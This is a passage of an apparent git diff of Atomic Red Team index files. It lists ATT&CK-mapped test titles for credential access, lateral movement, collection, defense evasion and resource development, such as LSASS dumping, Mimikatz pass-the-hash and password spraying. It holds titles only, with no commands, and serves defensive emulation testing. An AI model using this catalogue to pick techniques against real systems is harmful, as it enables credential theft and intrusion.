-credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
-credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
-credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
-credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
-credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
-credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
-credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
-credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
-credential-access,T1552.006,Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
-credential-access,T1552.006,Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
-credential-access,T1558.003,Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
-credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
-credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
-credential-access,T1003.001,LSASS Memory,1,Windows Credential Editor,0f7c5301-6859-45ba-8b4d-1fac30fc31ed,command_prompt
-credential-access,T1003.001,LSASS Memory,2,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
-credential-access,T1003.001,LSASS Memory,3,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell
-credential-access,T1003.001,LSASS Memory,4,Dump LSASS.exe Memory using direct system calls and API unhooking,7ae7102c-a099-45c8-b985-4c7a2d05790d,command_prompt
-credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual
-credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt
-credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
-credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
-credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
-credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
-credential-access,T1003.003,NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt
-credential-access,T1003.003,NTDS,5,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
-credential-access,T1003.003,NTDS,6,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
-credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
-credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
-credential-access,T1003,OS Credential Dumping,1,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
-credential-access,T1003,OS Credential Dumping,2,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
-credential-access,T1003,OS Credential Dumping,3,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
-credential-access,T1110.002,Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt
-credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
-credential-access,T1110.001,Password Guessing,1,Brute Force Credentials,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
-credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt
-credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
-credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
-credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
-credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
-credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
-credential-access,T1003.002,Security Account Manager,4,PowerDump Registry dump of SAM for hashes and usernames,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
lateral-movement,T1021.003,Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell
lateral-movement,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
lateral-movement,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 51fb922f..5e5dcd3e 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -24,7 +24,7 @@
- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1548.002 Bypass User Access Control](../../T1548.002/T1548.002.md)
+- [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md)
- Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
- Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
@@ -107,12 +107,15 @@
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md)
- Atomic Test #1: Append malicious start-process cmdlet [windows]
+- T1547.012 Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1055.012 Process Hollowing](../../T1055.012/T1055.012.md)
- Atomic Test #1: Process Hollowing using PowerShell [windows]
+ - Atomic Test #2: RunPE via VBA [windows]
- [T1055 Process Injection](../../T1055/T1055.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
+ - Atomic Test #2: Shellcode execution via VBA [windows]
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.004 Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
@@ -132,6 +135,7 @@
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
+ - Atomic Test #5: Task Scheduler via VBA [windows]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.002 Screensaver](../../T1546.002/T1546.002.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
@@ -156,6 +160,7 @@
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
+- T1053.006 Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547.003 Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -189,7 +194,7 @@
- Atomic Test #2: Domain Account and Group Manipulate [windows]
- T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1098.001 Additional Azure Service Principal Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1098.001 Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md)
- Atomic Test #1: Install AppInit Shim [windows]
@@ -303,6 +308,8 @@
- [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md)
- Atomic Test #1: Append malicious start-process cmdlet [windows]
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1547.012 Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.004 Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md)
@@ -324,6 +331,7 @@
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
+ - Atomic Test #5: Task Scheduler via VBA [windows]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.002 Screensaver](../../T1546.002/T1546.002.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
@@ -342,6 +350,8 @@
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
+- T1053.006 Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547.003 Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1505.002 Transport Agent](../../T1505.002/T1505.002.md)
@@ -366,6 +376,8 @@
- [T1003.008 /etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md)
- Atomic Test #1: Access /etc/shadow (Local) [linux]
- Atomic Test #2: Access /etc/passwd (Local) [linux]
+- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1558.004 AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1552.003 Bash History](../../T1552.003/T1552.003.md)
- Atomic Test #1: Search Through Bash History [linux, macos]
- T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -379,7 +391,8 @@
- Atomic Test #2: Extract passwords with grep [macos, linux]
- Atomic Test #3: Extracting passwords with findstr [windows]
- Atomic Test #4: Access unattend.xml [windows]
-- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1555 Credentials from Password Stores](../../T1555/T1555.md)
+ - Atomic Test #1: Extract Windows Credential Manager via VBA [windows]
- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #1: Run Chrome-password Collector [windows]
- Atomic Test #2: Search macOS Safari Cookies [macos]
@@ -425,6 +438,7 @@
- Atomic Test #4: Create Volume Shadow Copy with WMI [windows]
- Atomic Test #5: Create Volume Shadow Copy with Powershell [windows]
- Atomic Test #6: Create Symlink to Volume Shadow Copy [windows]
+- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux [linux]
- Atomic Test #2: Packet Capture macOS [macos]
@@ -464,6 +478,74 @@
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+# collection
+- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1560 Archive Collected Data](../../T1560/T1560.md)
+ - Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows]
+- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md)
+ - Atomic Test #1: Compress Data for Exfiltration With Rar [windows]
+ - Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows]
+ - Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
+ - Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
+ - Atomic Test #5: Data Compressed - nix - zip [linux, macos]
+ - Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
+ - Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
+ - Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux]
+- [T1123 Audio Capture](../../T1123/T1123.md)
+ - Atomic Test #1: using device audio capture commandlet [windows]
+- [T1119 Automated Collection](../../T1119/T1119.md)
+ - Atomic Test #1: Automated Collection Command Prompt [windows]
+ - Atomic Test #2: Automated Collection PowerShell [windows]
+ - Atomic Test #3: Recon information for export with PowerShell [windows]
+ - Atomic Test #4: Recon information for export with Command Prompt [windows]
+- [T1115 Clipboard Data](../../T1115/T1115.md)
+ - Atomic Test #1: Utilize Clipboard to store or execute commands from [windows]
+ - Atomic Test #2: Execute Commands from Clipboard using PowerShell [windows]
+ - Atomic Test #3: Execute commands from clipboard [macos]
+ - Atomic Test #4: Collect Clipboard Data via VBA [windows]
+- T1213.001 Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
+ - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
+- T1074 Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1530 Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1602 Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1114 Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
+ - Atomic Test #1: AppleScript - Prompt User for Password [macos]
+ - Atomic Test #2: PowerShell - Prompt User for Password [windows]
+- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
+ - Atomic Test #1: Input Capture [windows]
+- T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
+ - Atomic Test #1: Stage data from Discovery.bat [windows]
+ - Atomic Test #2: Stage data from Discovery.sh [linux, macos]
+ - Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows]
+- [T1114.001 Local Email Collection](../../T1114.001/T1114.001.md)
+ - Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows]
+- T1185 Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1602.002 Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1602.001 SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1113 Screen Capture](../../T1113/T1113.md)
+ - Atomic Test #1: Screencapture [macos]
+ - Atomic Test #2: Screencapture (silent) [macos]
+ - Atomic Test #3: X Windows Capture [linux]
+ - Atomic Test #4: Capture Linux Desktop using Import Tool [linux]
+ - Atomic Test #5: Windows Screencapture [windows]
+- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+
# defense-evasion
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -478,7 +560,7 @@
- [T1027.001 Binary Padding](../../T1027.001/T1027.001.md)
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1548.002 Bypass User Access Control](../../T1548.002/T1548.002.md)
+- [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md)
- Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
- Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
@@ -543,6 +625,8 @@
- Atomic Test #2: Certutil Rename and Decode [windows]
- [T1006 Direct Volume Access](../../T1006/T1006.md)
- Atomic Test #1: Read volume boot sector via DOS device path (PowerShell) [windows]
+- T1562.008 Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1600.002 Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.002 Disable Windows Event Logging](../../T1562.002/T1562.002.md)
- Atomic Test #1: Disable Windows IIS HTTP Logging [windows]
- Atomic Test #2: Kill Event Log Service Threads [windows]
@@ -581,6 +665,7 @@
- Atomic Test #24: Tamper with Windows Defender Evade Scanning -Process [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1601.002 Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.001 Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -604,9 +689,6 @@
- [T1553.001 Gatekeeper Bypass](../../T1553.001/T1553.001.md)
- Atomic Test #1: Gatekeeper Bypass [macos]
- T1484 Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1562.003 HISTCONTROL](../../T1562.003/T1562.003.md)
- - Atomic Test #1: Disable history collection [linux, macos]
- - Atomic Test #2: Mac HISTCONTROL [macos, linux]
- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1564.001 Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
@@ -623,6 +705,9 @@
- Atomic Test #1: Hidden Window [windows]
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1562.003 Impair Command History Logging](../../T1562.003/T1562.003.md)
+ - Atomic Test #1: Disable history collection [linux, macos]
+ - Atomic Test #2: Mac HISTCONTROL [macos, linux]
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.006 Indicator Blocking](../../T1562.006/T1562.006.md)
- Atomic Test #1: Auditing Configuration Changes on Linux Host [linux]
@@ -682,6 +767,7 @@
- Atomic Test #4: Add domain to Trusted sites Zone [windows]
- Atomic Test #5: Javascript in registry [windows]
- Atomic Test #6: Change Powershell Execution Policy to Bypass [windows]
+- T1601 Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1218.005 Mshta](../../T1218.005/T1218.005.md)
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- Atomic Test #2: Mshta executes VBScript to execute malicious command [windows]
@@ -701,6 +787,9 @@
- Atomic Test #2: Store file in Alternate Data Stream (ADS) [windows]
- Atomic Test #3: Create ADS command prompt [windows]
- Atomic Test #4: Create ADS PowerShell [windows]
+- T1599.001 Network Address Translation Traversal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1599 Network Boundary Bridging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1070.005 Network Share Connection Removal](../../T1070.005/T1070.005.md)
- Atomic Test #1: Add Network Share [windows]
- Atomic Test #2: Remove Network Share [windows]
@@ -725,6 +814,7 @@
- Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows]
- [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md)
- Atomic Test #1: Install and Register Password Filter DLL [windows]
+- T1601.001 Patch System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
@@ -737,11 +827,15 @@
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1055.012 Process Hollowing](../../T1055.012/T1055.012.md)
- Atomic Test #1: Process Hollowing using PowerShell [windows]
+ - Atomic Test #2: RunPE via VBA [windows]
- [T1055 Process Injection](../../T1055/T1055.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
+ - Atomic Test #2: Shellcode execution via VBA [windows]
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1216.001 PubPrn](../../T1216.001/T1216.001.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
+- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1600.001 Reduce Key Space [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1218.009 Regsvcs/Regasm](../../T1218.009/T1218.009.md)
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
@@ -794,6 +888,8 @@
- Atomic Test #3: Register-CimProvider - Execute evil dll [windows]
- Atomic Test #4: InfDefaultInstall.exe .inf Execution [windows]
- Atomic Test #5: ProtocolHandler.exe Downloaded a Suspicious File [windows]
+ - Atomic Test #6: Microsoft.Workflow.Compiler.exe Payload Execution [windows]
+ - Atomic Test #7: Renamed Microsoft.Workflow.Compiler.exe Payload Executions [windows]
- [T1216 Signed Script Proxy Execution](../../T1216/T1216.md)
- Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
- Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows]
@@ -815,6 +911,7 @@
- Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
- Atomic Test #3: Detect Virtualization Environment (MacOS) [macos]
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1221 Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -836,9 +933,12 @@
- T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1218.012 Verclsid [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1600 Weaken Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1222.001 Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md)
- Atomic Test #1: Take ownership using takeown utility [windows]
@@ -918,6 +1018,7 @@
- Atomic Test #7: List Internet Explorer Bookmarks using the command prompt [windows]
- T1087.004 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1580 Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1526 Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1087.002 Domain Account](../../T1087.002/T1087.002.md)
@@ -1058,6 +1159,83 @@
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+# resource-development
+- T1583 Acquire Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1583.005 Botnet [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1584.005 Botnet [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1587.002 Code Signing Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1588.003 Code Signing Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1586 Compromise Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1584 Compromise Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1583.002 DNS Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1584.002 DNS Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1587 Develop Capabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1587.003 Digital Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1588.004 Digital Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1583.001 Domains [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1584.001 Domains [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1585.002 Email Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1586.002 Email Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1585 Establish Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1587.004 Exploits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1588.005 Exploits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1587.001 Malware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1588.001 Malware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1588 Obtain Capabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1583.004 Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1584.004 Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1585.001 Social Media Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
